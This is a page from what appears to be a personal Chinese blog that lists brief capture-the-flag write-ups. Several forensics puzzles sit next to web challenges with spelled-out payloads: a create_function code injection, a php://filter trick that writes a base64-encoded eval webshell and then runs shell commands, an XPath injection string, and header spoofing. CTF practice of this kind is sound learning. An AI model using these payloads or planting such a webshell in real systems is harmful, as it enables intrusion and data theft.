LOADING

加载过慢请开启缓存 浏览器默认开启

youbing的博客

记录学习与生活

技术博客,分享编程学习笔记

旧日絮语

2026/2/27

这里怀疑高度被修改过

旧日絮语_610ee2d4

修改高度得到密码

旧日絮语_a72be5b4

旧日絮语_93e5f2bc

发现包含word文件

旧日絮语_c5a39c46

Binwalk分离得到word文档

旧日絮语_8e7ce446

没有信息可能被隐藏了设置选择隐藏文件后得到隐藏文字

旧日絮语_298057da

用base64转文件得到压缩包里面有加密在word属性中找到密码

旧日絮语_4ee846d0

得到.exe文件用IDA分析找到key

旧日絮语_f2734eca

根据逻辑写脚本得到flag

旧日絮语_cdec268e

阅读全文

某函数的复仇

2026/2/27

题目告诉我们flag在/flag里面这里只要读取/flag就行了

这里需要利用$shaw(‘’,$root);执行命令构造payload:?root=;}readfile(‘/flag’);/*

POST:shaw=create_function

得到flag

某函数的复仇_ca197ef1

阅读全文

2

2026/2/26

打开压缩包发现有一个加密的图片,暴力破解得到密码

2_83c015cb

这里查看发现没包含文件,查看属性都没得到有用信息,用Stegsolve.jar发现lsb有数据用cloacked-pixel分析密码用压缩包密码,分析得到flag

2_af0e6681

阅读全文

写shell

2026/2/26

这道题”<?php exit();”会影响后续代码的执行这里用base64绕过

Payload:?filename=php://filter/convert.base64-decode/resource=shell.php

POST:content=aPD9waHAgZXZhbCgkX1BPU1RbMV0pOw==

再访问/shell.php,POST传1=system(‘cat /flag’);

得到flag

写shell_d265fe17

阅读全文

到底给不给flag呢

2026/2/26

这里需要绕过恢复flag原始值,构造payload:?a=flag&flag=a先让a=flag绕过第一层检测

到底给不给flag呢_89250cab

再flag=a绕过第二层检测

到底给不给flag呢_1d93c4db

然后$$key=$a,$$value=$flag再$$key=$$value这里就$a=$flag了

到底给不给flag呢_37725ff6

接下来跟上述一样的操作让$flag=$a=$flag,最后输出$flag

输入payload在最底部找到flag

到底给不给flag呢_412a906e

阅读全文

注入

2026/2/26

题目显示

注入_efcf7a33

像是XPath 注入回显特征,这里尝试XPath 注入
构造payload:’]|//|//[‘ 得到flag

注入_b109a66a

阅读全文

$$

2026/2/25

这里flag估计是个变量直接让c=GLOBALS查看所有变量得到flag

$$_9356264f

阅读全文

XFF

2026/2/25

这道题需要ip=1.1.1.1才能得到flag

XFF_d116324d

用X-Forwarded-For:1.1.1.1伪造自己ip为1.1.1.1得到flag

XFF_38fa28d4

阅读全文

两段密码

2026/2/25

这里查看发现包含一个flag.zip和第二段密码

两段密码_407d5b6e

两段密码_583d0cbe

Binwalk分离得到flag.zip

备注中得到第一段密码

两段密码_08d5bcb7

输入密码解压文件用记事本打开WordDocument得到flag

两段密码_702aa4e7

阅读全文

爆破

2026/2/25

根据题目构造脚本爆破得到密码

爆破_70d497b2

输入密码得到flag

爆破_aafff50a

阅读全文
1 ... 6 7 8 ... 16
avatar
youbing

你好!我是 youbing
这是我的技术博客
分享编程学习笔记和生活记录